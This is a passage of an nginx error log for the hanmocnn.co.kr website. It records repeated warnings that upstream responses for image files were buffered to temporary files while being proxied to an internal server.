/var/cache/nginx/proxy_temp/5/28/0000018285 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:51:49 [warn] 956#956: *98620 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/28/0000018286 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:51:50 [warn] 956#956: *98620 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/28/0000018287 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:54:25 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/28/0000018288 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:54:25 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/28/0000018289 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:55:44 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/29/0000018290 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:55:44 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/29/0000018291 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:55:44 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/29/0000018292 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 12:15:42 [warn] 962#962: *98740 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/29/0000018293 while reading upstream, client: 68.183.27.37, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 12:44:35 [warn] 962#962: *98749 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/29/0000018294 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 12:46:12 [warn] 962#962: *98779 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/29/0000018295 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 12:46:12 [warn] 962#962: *98779 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/29/0000018296 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 12:46:12 [warn] 962#962: *98779 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/29/0000018297 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:06:12 [warn] 962#962: *98801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/29/0000018298 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:06:12 [warn] 962#962: *98801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/29/0000018299 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:06:12 [warn] 962#962: *98801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/30/0000018300 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:06:12 [warn] 962#962: *98801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/30/0000018301 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:09:23 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/30/0000018302 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:09:23 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/30/0000018303 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:09:23 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/30/0000018304 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:09:23 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/30/0000018305 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:09:31 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/30/0000018306 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:15:10 [warn] 961#961: *100349 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/05/0000019050 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:15:10 [warn] 961#961: *100349 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/05/0000019051 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:19:55 [warn] 961#961: *100381 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/05/0000019052 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:19:55 [warn] 961#961: *100381 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/05/0000019053 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:20:01 [warn] 961#961: *100381 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/05/0000019054 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:20:01 [warn] 961#961: *100381 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/05/0000019055 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:52:10 [warn] 961#961: *100446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/05/0000019056 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:52:10 [warn] 961#961: *100446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/05/0000019057 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:52:11 [warn] 961#961: *100446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/05/0000019058 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:57:27 [warn] 961#961: *100462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/05/0000019059 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:58:03 [warn] 961#961: *100462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/06/0000019060 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:58:03 [warn] 961#961: *100462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/06/0000019061 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:59:45 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/06/0000019062 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:59:45 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/06/0000019063 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:59:45 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/06/0000019064 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 13:59:45 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/06/0000019065 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:00:50 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/06/0000019066 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/06/0000019067 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/06/0000019068 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/06/0000019069 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/07/0000019070 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/07/0000019071 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/07/0000019072 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:04:23 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/07/0000019073 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:05:57 [warn] 961#961: *100568 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/07/0000019074 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:05:57 [warn] 961#961: *100568 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/07/0000019075 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:05:57 [warn] 961#961: *100568 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/07/0000019076 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:08:05 [warn] 961#961: *100612 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/07/0000019077 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 14:08:05 [warn] 961#961: *100612 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/07/0000019078 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:33:39 [warn] 976#976: *102477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/82/0000019823 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:33:39 [warn] 976#976: *102477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/82/0000019824 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:33:39 [warn] 976#976: *102477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/82/0000019825 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:34:00 [warn] 976#976: *102477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/82/0000019826 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:37:32 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/82/0000019827 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:37:48 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/82/0000019828 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:39:01 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/82/0000019829 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:39:01 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/83/0000019830 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:40:19 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/83/0000019831 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:40:19 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/83/0000019832 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:40:19 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/83/0000019833 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:41:10 [warn] 976#976: *102590 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/83/0000019834 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:41:10 [warn] 976#976: *102590 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/83/0000019835 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:41:11 [warn] 976#976: *102590 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/83/0000019836 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:42:11 [warn] 976#976: *102607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/83/0000019837 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:42:11 [warn] 976#976: *102607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/83/0000019838 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:42:11 [warn] 976#976: *102607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/83/0000019839 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:42:11 [warn] 976#976: *102607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/84/0000019840 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:59:30 [warn] 976#976: *102635 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/84/0000019841 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:59:30 [warn] 976#976: *102635 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/84/0000019842 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:59:31 [warn] 974#974: *102643 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/84/0000019843 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET 